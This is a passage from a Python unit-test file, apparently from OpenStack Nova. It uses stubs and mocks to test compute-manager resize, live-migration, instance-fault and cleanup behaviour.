self.stubs.Set(self.compute.driver, 'confirm_migration',
fake_confirm_migration_driver)
self._stub_out_resize_network_methods()
reservations = self._ensure_quota_reservations_committed()
instance_p = obj_base.obj_to_primitive(instance)
self.compute.run_instance(self.context, instance=instance_p)
# Confirm the instance size before the resize starts
instance.refresh()
instance_type_ref = db.flavor_get(self.context,
instance.instance_type_id)
self.assertEqual(instance_type_ref['flavorid'], '1')
instance.vm_state = old_vm_state
instance.power_state = p_state
instance.save()
new_instance_type_ref = db.flavor_get_by_flavor_id(
self.context, 3)
new_instance_type_p = jsonutils.to_primitive(new_instance_type_ref)
self.compute.prep_resize(self.context,
instance=instance,
instance_type=new_instance_type_p,
image={}, reservations=reservations)
migration = migration_obj.Migration.get_by_instance_and_status(
self.context.elevated(),
instance.uuid, 'pre-migrating')
# NOTE(mriedem): ensure prep_resize set old_vm_state in system_metadata
sys_meta = instance.system_metadata
self.assertEqual(old_vm_state, sys_meta['old_vm_state'])
instance.task_state = task_states.RESIZE_PREP
instance.save()
self.compute.resize_instance(self.context, instance=instance,
migration=migration,
image={},
instance_type=new_instance_type_p)
self.compute.finish_resize(self.context,
migration=migration,
disk_info={}, image={}, instance=instance)
# Prove that the instance size is now the new size
instance_type_ref = db.flavor_get(self.context,
instance.instance_type_id)
self.assertEqual(instance_type_ref['flavorid'], '3')
# Finally, confirm the resize and verify the new flavor is applied
instance.task_state = None
instance.save()
self.compute.confirm_resize(self.context, instance=instance,
reservations=reservations,
migration=migration)
instance.refresh()
instance_type_ref = db.flavor_get(self.context,
instance.instance_type_id)
self.assertEqual(instance_type_ref['flavorid'], '3')
self.assertEqual('fake-mini', migration.source_compute)
self.assertEqual(old_vm_state, instance.vm_state)
self.assertEqual(None, instance.task_state)
self.assertEqual(p_state, instance.power_state)
self.compute.terminate_instance(self.context, instance=instance)
def test_confirm_resize_from_active(self):
self._test_confirm_resize(power_on=True)
def test_confirm_resize_from_stopped(self):
self._test_confirm_resize(power_on=False)
def _test_finish_revert_resize(self, power_on,
remove_old_vm_state=False):
"""
Convenience method that does most of the work for the
test_finish_revert_resize tests.
:param power_on -- True if testing resize from ACTIVE state, False if
testing resize from STOPPED state.
:param remove_old_vm_state -- True if testing a case where the
'old_vm_state' system_metadata is not present when the
finish_revert_resize method is called.
"""
def fake(*args, **kwargs):
pass
def fake_finish_revert_migration_driver(*args, **kwargs):
# Confirm the instance uses the old type in finish_revert_resize
inst = args[0]
sys_meta = inst.system_metadata
self.assertEqual(sys_meta['instance_type_flavorid'], '1')
old_vm_state = None
if power_on:
old_vm_state = vm_states.ACTIVE
else:
old_vm_state = vm_states.STOPPED
params = {'vm_state': old_vm_state}
instance = self._create_fake_instance_obj(params)
self.stubs.Set(self.compute.driver, 'finish_migration', fake)
self.stubs.Set(self.compute.driver, 'finish_revert_migration',
fake_finish_revert_migration_driver)
self._stub_out_resize_network_methods()
reservations = self._ensure_quota_reservations_committed()
instance_p = obj_base.obj_to_primitive(instance)
self.compute.run_instance(self.context, instance=instance_p)
instance.refresh()
instance_type_ref = db.flavor_get(self.context,
instance.instance_type_id)
self.assertEqual(instance_type_ref['flavorid'], '1')
old_vm_state = instance['vm_state']
instance.host = 'foo'
instance.vm_state = old_vm_state
instance.save()
new_instance_type_ref = db.flavor_get_by_flavor_id(
self.context, 3)
new_instance_type_p = jsonutils.to_primitive(new_instance_type_ref)
self.compute.prep_resize(self.context,
instance=instance,
instance_type=new_instance_type_p,
image={}, reservations=reservations)
migration = migration_obj.Migration.get_by_instance_and_status(
self.context.elevated(),
instance.uuid, 'pre-migrating')
# NOTE(mriedem): ensure prep_resize set old_vm_state in system_metadata
sys_meta = instance.system_metadata
self.assertEqual(old_vm_state, sys_meta['old_vm_state'])
instance.task_state = task_states.RESIZE_PREP
instance.save()
self.compute.resize_instance(self.context, instance=instance,
migration=migration,
image={},
instance_type=new_instance_type_p)
self.compute.finish_resize(self.context,
migration=migration,
disk_info={}, image={}, instance=instance)
# Prove that the instance size is now the new size
instance_type_ref = db.flavor_get(self.context,
instance['instance_type_id'])
self.assertEqual(instance_type_ref['flavorid'], '3')
instance.task_state = task_states.RESIZE_REVERTING
instance.save()
self.compute.revert_resize(self.context,
migration=migration, instance=instance,
reservations=reservations)
instance.refresh()
if remove_old_vm_state:
# need to wipe out the old_vm_state from system_metadata
# before calling finish_revert_resize
sys_meta = instance.system_metadata
sys_meta.pop('old_vm_state')
# Have to reset for save() to work
instance.system_metadata = sys_meta
instance.save()
self.compute.finish_revert_resize(self.context,
migration=migration,
instance=instance, reservations=reservations)
self.assertEqual(instance.task_state, None)
instance_type_ref = db.flavor_get(self.context,
instance['instance_type_id'])
self.assertEqual(instance_type_ref['flavorid'], '1')
self.assertEqual(instance.host, migration.source_compute)
if remove_old_vm_state:
self.assertEqual(vm_states.ACTIVE, instance.vm_state)
else:
self.assertEqual(old_vm_state, instance.vm_state)
def test_finish_revert_resize_from_active(self):
self._test_finish_revert_resize(power_on=True)
def test_finish_revert_resize_from_stopped(self):
self._test_finish_revert_resize(power_on=False)
def test_finish_revert_resize_from_stopped_remove_old_vm_state(self):
# in this case we resize from STOPPED but end up with ACTIVE
# because the old_vm_state value is not present in
# finish_revert_resize
self._test_finish_revert_resize(power_on=False,
remove_old_vm_state=True)
def _test_cleanup_stored_instance_types(self, old, new, revert=False):
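        # Helper: verify _cleanup_stored_instance_types returns the cleaned
        # system metadata and the flavor to keep (old on revert, new on
        # confirm).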
instance = self._create_fake_instance_obj()
migration = dict(old_instance_type_id=old,
new_instance_type_id=new)
instance.system_metadata = dict(instance_type_id=old)
sys_meta = dict(instance.system_metadata)
self.mox.StubOutWithMock(flavors, 'extract_flavor')
self.mox.StubOutWithMock(flavors, 'delete_flavor_info')
self.mox.StubOutWithMock(flavors, 'save_flavor_info')
if revert:
flavors.extract_flavor(instance, 'old_').AndReturn(
{'instance_type_id': old})
flavors.save_flavor_info(
sys_meta, {'instance_type_id': old}).AndReturn(sys_meta)
else:
flavors.extract_flavor(instance).AndReturn(
{'instance_type_id': new})
flavors.delete_flavor_info(
sys_meta, 'old_').AndReturn(sys_meta)
flavors.delete_flavor_info(
sys_meta, 'new_').AndReturn(sys_meta)
self.mox.ReplayAll()
res = self.compute._cleanup_stored_instance_types(migration, instance,
revert)
self.assertEqual(res,
(sys_meta,
{'instance_type_id': revert and old or new}))
def test_cleanup_stored_instance_types_for_resize(self):
self._test_cleanup_stored_instance_types('1', '2')
def test_cleanup_stored_instance_types_for_resize_with_update(self):
self._test_cleanup_stored_instance_types('1', '2', True)
def test_cleanup_stored_instance_types_for_migration(self):
self._test_cleanup_stored_instance_types('1', '1')
def test_cleanup_stored_instance_types_for_migration_with_update(self):
self._test_cleanup_stored_instance_types('1', '1', True)
def test_get_by_flavor_id(self):
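        # Ensure a flavor can be looked up by its flavorid.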
        flavor = flavors.get_flavor_by_flavor_id(1)
        self.assertEqual(flavor['name'], 'm1.tiny')
def test_resize_same_source_fails(self):
"""Ensure instance fails to migrate when source and destination are
the same host.
"""
reservations = self._ensure_quota_reservations_rolledback()
instance = self._create_fake_instance_obj()
instance_p = obj_base.obj_to_primitive(instance)
self.compute.run_instance(self.context, instance=instance_p)
instance.refresh()
instance_type = flavors.get_default_flavor()
self.assertRaises(exception.MigrationError, self.compute.prep_resize,
self.context, instance=instance,
instance_type=instance_type, image={},
reservations=reservations)
self.compute.terminate_instance(self.context, instance)
def test_resize_instance_handles_migration_error(self):
# Ensure vm_state is ERROR when error occurs.
def raise_migration_failure(*args):
raise test.TestingException()
self.stubs.Set(self.compute.driver,
'migrate_disk_and_power_off',
raise_migration_failure)
reservations = self._ensure_quota_reservations_rolledback()
instance = self._create_fake_instance_obj()
instance_type = flavors.get_default_flavor()
instance_p = obj_base.obj_to_primitive(instance)
self.compute.run_instance(self.context, instance=instance_p)
instance.host = 'foo'
instance.save()
self.compute.prep_resize(self.context, instance=instance,
instance_type=instance_type,
image={}, reservations=reservations)
migration = migration_obj.Migration.get_by_instance_and_status(
self.context.elevated(),
instance.uuid, 'pre-migrating')
instance.task_state = task_states.RESIZE_PREP
instance.save()
self.assertRaises(test.TestingException, self.compute.resize_instance,
self.context, instance=instance,
migration=migration, image={},
reservations=reservations,
instance_type=jsonutils.to_primitive(instance_type))
# NOTE(comstud): error path doesn't use objects, so our object
# is not updated. Refresh and compare against the DB.
instance.refresh()
self.assertEqual(instance.vm_state, vm_states.ERROR)
self.compute.terminate_instance(self.context, instance=instance)
def test_pre_live_migration_instance_has_no_fixed_ip(self):
# Confirm that no exception is raised if there is no fixed ip on
# pre_live_migration
instance = jsonutils.to_primitive(self._create_fake_instance())
c = context.get_admin_context()
self.mox.ReplayAll()
self.compute.driver.pre_live_migration(mox.IsA(c), mox.IsA(instance),
{'block_device_mapping': []},
mox.IgnoreArg(),
mox.IgnoreArg(),
mox.IgnoreArg())
def test_pre_live_migration_works_correctly(self):
# Confirm setup_compute_volume is called when volume is mounted.
def stupid(*args, **kwargs):
return fake_network.fake_get_instance_nw_info(self.stubs)
self.stubs.Set(nova.compute.manager.ComputeManager,
'_get_instance_nw_info', stupid)
# creating instance testdata
instance = jsonutils.to_primitive(self._create_fake_instance(
{'host': 'dummy'}))
c = context.get_admin_context()
nw_info = fake_network.fake_get_instance_nw_info(self.stubs)
# creating mocks
self.mox.StubOutWithMock(self.compute.driver, 'pre_live_migration')
self.compute.driver.pre_live_migration(mox.IsA(c), mox.IsA(instance),
{'block_device_mapping': []},
mox.IgnoreArg(),
mox.IgnoreArg(),
mox.IgnoreArg())
self.mox.StubOutWithMock(self.compute.driver,
'ensure_filtering_rules_for_instance')
self.compute.driver.ensure_filtering_rules_for_instance(
mox.IsA(instance), nw_info)
self.mox.StubOutWithMock(self.compute.network_api,
'setup_networks_on_host')
self.compute.network_api.setup_networks_on_host(c, instance,
self.compute.host)
fake_notifier.NOTIFICATIONS = []
# start test
self.mox.ReplayAll()
migrate_data = {'is_shared_storage': False}
ret = self.compute.pre_live_migration(c, instance=instance,
block_migration=False,
migrate_data=migrate_data)
self.assertEqual(ret, None)
self.assertEqual(len(fake_notifier.NOTIFICATIONS), 2)
msg = fake_notifier.NOTIFICATIONS[0]
self.assertEqual(msg.event_type,
'compute.instance.live_migration.pre.start')
msg = fake_notifier.NOTIFICATIONS[1]
self.assertEqual(msg.event_type,
'compute.instance.live_migration.pre.end')
# cleanup
db.instance_destroy(c, instance['uuid'])
def test_live_migration_exception_rolls_back(self):
# Confirm exception when pre_live_migration fails.
c = context.get_admin_context()
src_host = 'fake-src-host'
instance = dict(uuid='fake_instance', host=src_host,
name='fake-name')
updated_instance = self._create_fake_instance(
{'host': 'fake-dest-host'})
dest_host = updated_instance['host']
fake_bdms = [dict(volume_id='vol1-id'), dict(volume_id='vol2-id')]
# creating mocks
self.mox.StubOutWithMock(self.compute.driver,
'get_instance_disk_info')
self.mox.StubOutWithMock(self.compute.compute_rpcapi,
'pre_live_migration')
self.mox.StubOutWithMock(self.compute, '_instance_update')
self.mox.StubOutWithMock(self.compute, '_get_instance_volume_bdms')
self.mox.StubOutWithMock(self.compute.network_api,
'setup_networks_on_host')
self.mox.StubOutWithMock(self.compute.compute_rpcapi,
'remove_volume_connection')
self.mox.StubOutWithMock(self.compute.compute_rpcapi,
'rollback_live_migration_at_destination')
self.compute.driver.get_instance_disk_info(
instance['name']).AndReturn('fake_disk')
self.compute.compute_rpcapi.pre_live_migration(c,
instance, True, 'fake_disk', dest_host,
{}).AndRaise(test.TestingException())
self.compute._instance_update(c, instance['uuid'],
host=src_host, vm_state=vm_states.ACTIVE,
task_state=None,
expected_task_state=task_states.MIGRATING).AndReturn(
updated_instance)
self.compute.network_api.setup_networks_on_host(c,
updated_instance, self.compute.host)
self.compute._get_instance_volume_bdms(c,
updated_instance).AndReturn(fake_bdms)
self.compute.compute_rpcapi.remove_volume_connection(
c, updated_instance, 'vol1-id', dest_host)
self.compute.compute_rpcapi.remove_volume_connection(
c, updated_instance, 'vol2-id', dest_host)
self.compute.compute_rpcapi.rollback_live_migration_at_destination(
c, updated_instance, dest_host)
# start test
self.mox.ReplayAll()
self.assertRaises(test.TestingException,
self.compute.live_migration,
c, dest=dest_host, block_migration=True,
instance=instance)
def test_live_migration_works_correctly(self):
        # Confirm live_migration() works as expected.
# creating instance testdata
c = context.get_admin_context()
instance_ref = self._create_fake_instance()
instance_ref['host'] = self.compute.host
dest = 'desthost'
inst_uuid = instance_ref['uuid']
instance = jsonutils.to_primitive(instance_ref)
migrate_data = {'is_shared_storage': False}
self.mox.StubOutWithMock(self.compute.compute_rpcapi,
'pre_live_migration')
self.compute.compute_rpcapi.pre_live_migration(
c, instance, False, None, dest, migrate_data)
self.mox.StubOutWithMock(self.compute.conductor_api,
'network_migrate_instance_start')
migration = {'source_compute': instance['host'], 'dest_compute': dest}
self.compute.conductor_api.network_migrate_instance_start(c, instance,
migration)
self.mox.StubOutWithMock(self.compute.compute_rpcapi,
'post_live_migration_at_destination')
self.compute.compute_rpcapi.post_live_migration_at_destination(
c, instance, False, dest)
self.mox.StubOutWithMock(self.compute.network_api,
'setup_networks_on_host')
self.compute.network_api.setup_networks_on_host(c, instance,
instance['host'],
teardown=True)
# start test
self.mox.ReplayAll()
ret = self.compute.live_migration(c, dest=dest,
instance=instance,
migrate_data=migrate_data)
self.assertEqual(ret, None)
# cleanup
db.instance_destroy(c, inst_uuid)
def test_post_live_migration_no_shared_storage_working_correctly(self):
"""Confirm post_live_migration() works correctly as expected
for non shared storage migration.
"""
# Create stubs
result = {}
def fakedestroy(*args, **kwargs):
result['destroyed'] = True
self.stubs.Set(self.compute.driver, 'destroy', fakedestroy)
dest = 'desthost'
srchost = self.compute.host
# creating testdata
c = context.get_admin_context()
inst_ref = jsonutils.to_primitive(self._create_fake_instance({
'host': srchost,
'state_description': 'migrating',
'state': power_state.PAUSED}))
inst_uuid = inst_ref['uuid']
db.instance_update(c, inst_uuid,
{'task_state': task_states.MIGRATING,
'power_state': power_state.PAUSED})
# creating mocks
self.mox.StubOutWithMock(self.compute.driver, 'unfilter_instance')
self.compute.driver.unfilter_instance(inst_ref, [])
self.mox.StubOutWithMock(self.compute.conductor_api,
'network_migrate_instance_start')
migration = {'source_compute': srchost, 'dest_compute': dest, }
self.compute.conductor_api.network_migrate_instance_start(c, inst_ref,
migration)
self.mox.StubOutWithMock(self.compute.compute_rpcapi,
'post_live_migration_at_destination')
self.compute.compute_rpcapi.post_live_migration_at_destination(
c, inst_ref, False, dest)
self.mox.StubOutWithMock(self.compute.network_api,
'setup_networks_on_host')
self.compute.network_api.setup_networks_on_host(c, inst_ref,
self.compute.host,
teardown=True)
# start test
self.mox.ReplayAll()
migrate_data = {'is_shared_storage': False}
self.compute._post_live_migration(c, inst_ref, dest,
migrate_data=migrate_data)
        self.assertIn('destroyed', result)
        self.assertTrue(result['destroyed'])
def test_post_live_migration_working_correctly(self):
        # Confirm post_live_migration() works as expected.
dest = 'desthost'
srchost = self.compute.host
# creating testdata
c = context.get_admin_context()
inst_ref = jsonutils.to_primitive(self._create_fake_instance({
'host': srchost,
'state_description': 'migrating',
'state': power_state.PAUSED}))
inst_uuid = inst_ref['uuid']
db.instance_update(c, inst_uuid,
{'task_state': task_states.MIGRATING,
'power_state': power_state.PAUSED})
# creating mocks
with contextlib.nested(
mock.patch.object(self.compute.driver, 'post_live_migration'),
mock.patch.object(self.compute.driver, 'unfilter_instance'),
mock.patch.object(self.compute.conductor_api,
'network_migrate_instance_start'),
mock.patch.object(self.compute.compute_rpcapi,
'post_live_migration_at_destination'),
mock.patch.object(self.compute.driver, 'unplug_vifs'),
mock.patch.object(self.compute.network_api,
'setup_networks_on_host')
) as (
post_live_migration, unfilter_instance,
network_migrate_instance_start, post_live_migration_at_destination,
unplug_vifs, setup_networks_on_host
):
self.compute._post_live_migration(c, inst_ref, dest)
post_live_migration.assert_has_calls([
mock.call(c, inst_ref, {'block_device_mapping': []})])
unfilter_instance.assert_has_calls([mock.call(inst_ref, [])])
migration = {'source_compute': srchost,
'dest_compute': dest, }
network_migrate_instance_start.assert_has_calls([
mock.call(c, inst_ref, migration)])
post_live_migration_at_destination.assert_has_calls([
mock.call(c, inst_ref, False, dest)])
unplug_vifs.assert_has_calls([mock.call(inst_ref, [])])
setup_networks_on_host.assert_has_calls([
mock.call(c, inst_ref, self.compute.host, teardown=True)])
def _begin_post_live_migration_at_destination(self):
self.mox.StubOutWithMock(self.compute.network_api,
'setup_networks_on_host')
self.mox.StubOutWithMock(self.compute.conductor_api,
'network_migrate_instance_finish')
self.mox.StubOutWithMock(self.compute, '_get_power_state')
self.mox.StubOutWithMock(self.compute, '_get_compute_info')
params = {'task_state': task_states.MIGRATING,
'power_state': power_state.PAUSED, }
self.instance = jsonutils.to_primitive(
self._create_fake_instance(params))
self.admin_ctxt = context.get_admin_context()
self.instance = db.instance_get_by_uuid(self.admin_ctxt,
self.instance['uuid'])
self.compute.network_api.setup_networks_on_host(self.admin_ctxt,
self.instance,
self.compute.host)
migration = {'source_compute': self.instance['host'],
'dest_compute': self.compute.host, }
self.compute.conductor_api.network_migrate_instance_finish(
self.admin_ctxt, self.instance, migration)
fake_net_info = []
fake_block_dev_info = {'foo': 'bar'}
self.compute.driver.post_live_migration_at_destination(self.admin_ctxt,
self.instance,
fake_net_info,
False,
fake_block_dev_info)
self.compute._get_power_state(self.admin_ctxt,
self.instance).AndReturn(
'fake_power_state')
def _finish_post_live_migration_at_destination(self):
self.compute.network_api.setup_networks_on_host(self.admin_ctxt,
mox.IgnoreArg(), self.compute.host)
fake_notifier.NOTIFICATIONS = []
self.mox.ReplayAll()
self.compute.post_live_migration_at_destination(self.admin_ctxt,
self.instance)
self.assertEqual(len(fake_notifier.NOTIFICATIONS), 2)
msg = fake_notifier.NOTIFICATIONS[0]
self.assertEqual(msg.event_type,
'compute.instance.live_migration.post.dest.start')
msg = fake_notifier.NOTIFICATIONS[1]
self.assertEqual(msg.event_type,
'compute.instance.live_migration.post.dest.end')
return self.compute.conductor_api.instance_get_by_uuid(self.admin_ctxt,
self.instance['uuid'])
def test_post_live_migration_at_destination_with_compute_info(self):
"""The instance's node property should be updated correctly."""
self._begin_post_live_migration_at_destination()
hypervisor_hostname = 'fake_hypervisor_hostname'
fake_compute_info = {'hypervisor_hostname': hypervisor_hostname}
self.compute._get_compute_info(mox.IgnoreArg(),
mox.IgnoreArg()).AndReturn(
fake_compute_info)
updated = self._finish_post_live_migration_at_destination()
self.assertEqual(updated['node'], hypervisor_hostname)
def test_post_live_migration_at_destination_without_compute_info(self):
"""The instance's node property should be set to None if we fail to
get compute_info.
"""
self._begin_post_live_migration_at_destination()
self.compute._get_compute_info(mox.IgnoreArg(),
mox.IgnoreArg()).AndRaise(
exception.NotFound())
updated = self._finish_post_live_migration_at_destination()
self.assertIsNone(updated['node'])
def test_rollback_live_migration_at_destination_correctly(self):
# creating instance testdata
c = context.get_admin_context()
instance_ref = self._create_fake_instance({'host': 'dummy'})
inst_uuid = instance_ref['uuid']
inst_id = instance_ref['id']
instance = jsonutils.to_primitive(db.instance_get(c, inst_id))
fake_notifier.NOTIFICATIONS = []
self.mox.StubOutWithMock(self.compute.network_api,
'setup_networks_on_host')
self.compute.network_api.setup_networks_on_host(c, instance,
self.compute.host,
teardown=True)
# start test
self.mox.ReplayAll()
ret = self.compute.rollback_live_migration_at_destination(c,
instance=instance)
self.assertEqual(ret, None)
self.assertEqual(len(fake_notifier.NOTIFICATIONS), 2)
msg = fake_notifier.NOTIFICATIONS[0]
self.assertEqual(msg.event_type,
'compute.instance.live_migration.rollback.dest.start')
msg = fake_notifier.NOTIFICATIONS[1]
self.assertEqual(msg.event_type,
'compute.instance.live_migration.rollback.dest.end')
# cleanup
db.instance_destroy(c, inst_uuid)
def test_run_kill_vm(self):
# Detect when a vm is terminated behind the scenes.
instance = jsonutils.to_primitive(self._create_fake_instance())
self.compute.run_instance(self.context, instance=instance)
instances = db.instance_get_all(self.context)
LOG.info(_("Running instances: %s"), instances)
self.assertEqual(len(instances), 1)
instance_name = instances[0]['name']
self.compute.driver.test_remove_vm(instance_name)
# Force the compute manager to do its periodic poll
ctxt = context.get_admin_context()
self.compute._sync_power_states(ctxt)
instances = db.instance_get_all(self.context)
LOG.info(_("After force-killing instances: %s"), instances)
self.assertEqual(len(instances), 1)
self.assertEqual(instances[0]['task_state'], None)
def test_add_instance_fault(self):
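        # Ensure an unexpected exception is recorded as a 500 fault with
        # the traceback in its details.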
instance = self._create_fake_instance()
exc_info = None
def fake_db_fault_create(ctxt, values):
self.assertTrue('raise NotImplementedError' in values['details'])
del values['details']
expected = {
'code': 500,
'message': 'test',
'instance_uuid': instance['uuid'],
'host': self.compute.host
}
self.assertEquals(expected, values)
try:
raise NotImplementedError('test')
except NotImplementedError:
exc_info = sys.exc_info()
self.stubs.Set(nova.db, 'instance_fault_create', fake_db_fault_create)
ctxt = context.get_admin_context()
compute_utils.add_instance_fault_from_exc(ctxt,
self.compute.conductor_api,
instance,
NotImplementedError('test'),
exc_info)
def test_add_instance_fault_with_remote_error(self):
instance = self._create_fake_instance()
exc_info = None
def fake_db_fault_create(ctxt, values):
self.assertTrue('raise rpc_common.RemoteError'
in values['details'])
del values['details']
expected = {
'code': 500,
'instance_uuid': instance['uuid'],
'message': 'Remote error: test My Test Message\nNone.',
'host': self.compute.host
}
self.assertEquals(expected, values)
try:
raise rpc_common.RemoteError('test', 'My Test Message')
except rpc_common.RemoteError as exc:
exc_info = sys.exc_info()
self.stubs.Set(nova.db, 'instance_fault_create', fake_db_fault_create)
ctxt = context.get_admin_context()
compute_utils.add_instance_fault_from_exc(ctxt,
self.compute.conductor_api, instance, exc, exc_info)
def test_add_instance_fault_user_error(self):
instance = self._create_fake_instance()
exc_info = None
def fake_db_fault_create(ctxt, values):
expected = {
'code': 400,
'message': 'fake details',
'details': '',
'instance_uuid': instance['uuid'],
'host': self.compute.host
}
self.assertEquals(expected, values)
user_exc = exception.Invalid('fake details', code=400)
try:
raise user_exc
except exception.Invalid:
exc_info = sys.exc_info()
self.stubs.Set(nova.db, 'instance_fault_create', fake_db_fault_create)
ctxt = context.get_admin_context()
compute_utils.add_instance_fault_from_exc(ctxt,
self.compute.conductor_api, instance, user_exc, exc_info)
def test_add_instance_fault_no_exc_info(self):
instance = self._create_fake_instance()
def fake_db_fault_create(ctxt, values):
expected = {
'code': 500,
'message': 'test',
'details': '',
'instance_uuid': instance['uuid'],
'host': self.compute.host
}
self.assertEquals(expected, values)
self.stubs.Set(nova.db, 'instance_fault_create', fake_db_fault_create)
ctxt = context.get_admin_context()
compute_utils.add_instance_fault_from_exc(ctxt,
self.compute.conductor_api,
instance,
NotImplementedError('test'))
def test_add_instance_fault_long_message(self):
instance = self._create_fake_instance()
message = 300 * 'a'
def fake_db_fault_create(ctxt, values):
expected = {
'code': 500,
'message': message[:255],
'details': '',
'instance_uuid': instance['uuid'],
'host': self.compute.host
}
self.assertEquals(expected, values)
self.stubs.Set(nova.db, 'instance_fault_create', fake_db_fault_create)
ctxt = context.get_admin_context()
compute_utils.add_instance_fault_from_exc(ctxt,
self.compute.conductor_api,
instance,
NotImplementedError(message))
def test_cleanup_running_deleted_instances(self):
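        # Reap instances still running on the hypervisor that are already
        # deleted in the database, continuing past a shutdown failure.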
admin_context = context.get_admin_context()
deleted_at = (timeutils.utcnow() -
datetime.timedelta(hours=1, minutes=5))
instance1 = self._create_fake_instance({"deleted_at": deleted_at,
"deleted": True})
instance2 = self._create_fake_instance({"deleted_at": deleted_at,
"deleted": True})
self.mox.StubOutWithMock(self.compute, '_get_instances_on_driver')
self.compute._get_instances_on_driver(
admin_context, {'deleted': True,
'soft_deleted': False,
'host': self.compute.host}).AndReturn([instance1,
instance2])
self.flags(running_deleted_instance_timeout=3600,
running_deleted_instance_action='reap')
bdms = []
self.mox.StubOutWithMock(self.compute, "_shutdown_instance")
# Simulate an error and make sure cleanup proceeds with next instance.
self.compute._shutdown_instance(admin_context,
instance1,
bdms,
notify=False).\
AndRaise(test.TestingException)
self.compute._shutdown_instance(admin_context,
instance2,
bdms,
notify=False).AndReturn(None)
self.mox.StubOutWithMock(self.compute, "_cleanup_volumes")
self.compute._cleanup_volumes(admin_context,
instance1['uuid'],
bdms).AndReturn(None)
self.mox.ReplayAll()
self.compute._cleanup_running_deleted_instances(admin_context)
def test_running_deleted_instances(self):
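        # Ensure _running_deleted_instances returns deleted instances on
        # this host that are older than the configured timeout.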
admin_context = context.get_admin_context()
self.compute.host = 'host'
instance1 = {}
instance1['deleted'] = True
instance1['deleted_at'] = "sometimeago"
self.mox.StubOutWithMock(self.compute, '_get_instances_on_driver')
self.compute._get_instances_on_driver(
admin_context, {'deleted': True,
'soft_deleted': False,
'host': self.compute.host}).AndReturn([instance1])
self.mox.StubOutWithMock(timeutils, 'is_older_than')
timeutils.is_older_than('sometimeago',
CONF.running_deleted_instance_timeout).AndReturn(True)
self.mox.ReplayAll()
val = self.compute._running_deleted_instances(admin_context)
self.assertEqual(val, [instance1])
def test_get_instance_nw_info(self):
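        # Ensure _get_instance_nw_info refreshes the instance via the
        # conductor and returns network info from the network API.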
fake_network.unset_stub_network_methods(self.stubs)
fake_instance = {'uuid': 'fake-instance'}
fake_nw_info = network_model.NetworkInfo()
self.mox.StubOutWithMock(self.compute.network_api,
'get_instance_nw_info')
self.mox.StubOutWithMock(self.compute.conductor_api,
'instance_get_by_uuid')
self.compute.conductor_api.instance_get_by_uuid(
self.context, fake_instance['uuid']).AndReturn(fake_instance)
self.compute.network_api.get_instance_nw_info(self.context,
fake_instance).AndReturn(fake_nw_info)
self.mox.ReplayAll()
result = self.compute._get_instance_nw_info(self.context,
fake_instance)
self.assertEqual(fake_nw_info, result)
def test_heal_instance_info_cache(self):
# Update on every call for the test
self.flags(heal_instance_info_cache_interval=-1)
ctxt = context.get_admin_context()
instance_map = {}
instances = []
for x in xrange(5):
inst_uuid = 'fake-uuid-%s' % x
instance_map[inst_uuid] = fake_instance.fake_db_instance(
uuid=inst_uuid, host=CONF.host, created_at=None)
# These won't be in our instance since they're not requested
instances.append(instance_map[inst_uuid])
call_info = {'get_all_by_host': 0, 'get_by_uuid': 0,
'get_nw_info': 0, 'expected_instance': None}
def fake_instance_get_all_by_host(context, host, columns_to_join):
call_info['get_all_by_host'] += 1
self.assertEqual([], columns_to_join)
return instances[:]
def fake_instance_get_by_uuid(context, instance_uuid, columns_to_join):
if instance_uuid not in instance_map:
raise exception.InstanceNotFound(instance_id=instance_uuid)
call_info['get_by_uuid'] += 1
self.assertEqual(['system_metadata'], columns_to_join)
return instance_map[instance_uuid]
# NOTE(comstud): Override the stub in setUp()
def fake_get_instance_nw_info(context, instance):
# Note that this exception gets caught in compute/manager
# and is ignored. However, the below increment of
# 'get_nw_info' won't happen, and you'll get an assert
# failure checking it below.
self.assertEqual(call_info['expected_instance']['uuid'],
instance['uuid'])
call_info['get_nw_info'] += 1
self.stubs.Set(db, 'instance_get_all_by_host',
fake_instance_get_all_by_host)
self.stubs.Set(db, 'instance_get_by_uuid',
fake_instance_get_by_uuid)
self.stubs.Set(self.compute, '_get_instance_nw_info',
fake_get_instance_nw_info)
call_info['expected_instance'] = instances[0]
self.compute._heal_instance_info_cache(ctxt)
self.assertEqual(1, call_info['get_all_by_host'])
self.assertEqual(0, call_info['get_by_uuid'])
self.assertEqual(1, call_info['get_nw_info'])
call_info['expected_instance'] = instances[1]
self.compute._heal_instance_info_cache(ctxt)
self.assertEqual(1, call_info['get_all_by_host'])
self.assertEqual(1, call_info['get_by_uuid'])
self.assertEqual(2, call_info['get_nw_info'])
# Make an instance switch hosts
instances[2]['host'] = 'not-me'
# Make an instance disappear
instance_map.pop(instances[3]['uuid'])
        # '2' and '3' should be skipped.
call_info['expected_instance'] = instances[4]
self.compute._heal_instance_info_cache(ctxt)
self.assertEqual(call_info['get_all_by_host'], 1)
        # Incremented for '2' and '4'; '3' caused a raise above.
self.assertEqual(call_info['get_by_uuid'], 3)
self.assertEqual(call_info['get_nw_info'], 3)
# Should be no more left.
self.assertEqual(len(self.compute._instance_uuids_to_heal), 0)
# This should cause a DB query now so we get first instance
# back again
call_info['expected_instance'] = instances[0]
self.compute._heal_instance_info_cache(ctxt)
self.assertEqual(call_info['get_all_by_host'], 2)
# Stays the same, because the instance came from the DB
self.assertEqual(call_info['get_by_uuid'], 3)
self.assertEqual(call_info['get_nw_info'], 4)
def test_poll_rescued_instances(self):
timed_out_time = timeutils.utcnow() - datetime.timedelta(minutes=5)
not_timed_out_time = timeutils.utcnow()
instances = [{'uuid': 'fake_uuid1', 'vm_state': vm_states.RESCUED,
'launched_at': timed_out_time},
{'uuid': 'fake_uuid2', 'vm_state': vm_states.RESCUED,
'launched_at': timed_out_time},
{'uuid': 'fake_uuid3', 'vm_state': vm_states.RESCUED,
'launched_at': not_timed_out_time}]
unrescued_instances = {'fake_uuid1': False, 'fake_uuid2': False}
def fake_instance_get_all_by_filters(context, filters,
columns_to_join):
self.assertEqual(columns_to_join, [])
return instances
def fake_unrescue(context, instance):
unrescued_instances[instance['uuid']] = True
self.stubs.Set(self.compute.conductor_api,
'instance_get_all_by_filters',
fake_instance_get_all_by_filters)
self.stubs.Set(self.compute.conductor_api, 'compute_unrescue',
fake_unrescue)
self.flags(rescue_timeout=60)
ctxt = context.get_admin_context()
self.compute._poll_rescued_instances(ctxt)
for instance in unrescued_instances.values():
self.assertTrue(instance)
def test_poll_unconfirmed_resizes(self):
instances = [
fake_instance.fake_db_instance(uuid='fake_uuid1',
vm_state=vm_states.RESIZED,
task_state=None),
fake_instance.fake_db_instance(uuid='noexist'),
fake_instance.fake_db_instance(uuid='fake_uuid2',
vm_state=vm_states.ERROR,
task_state=None),
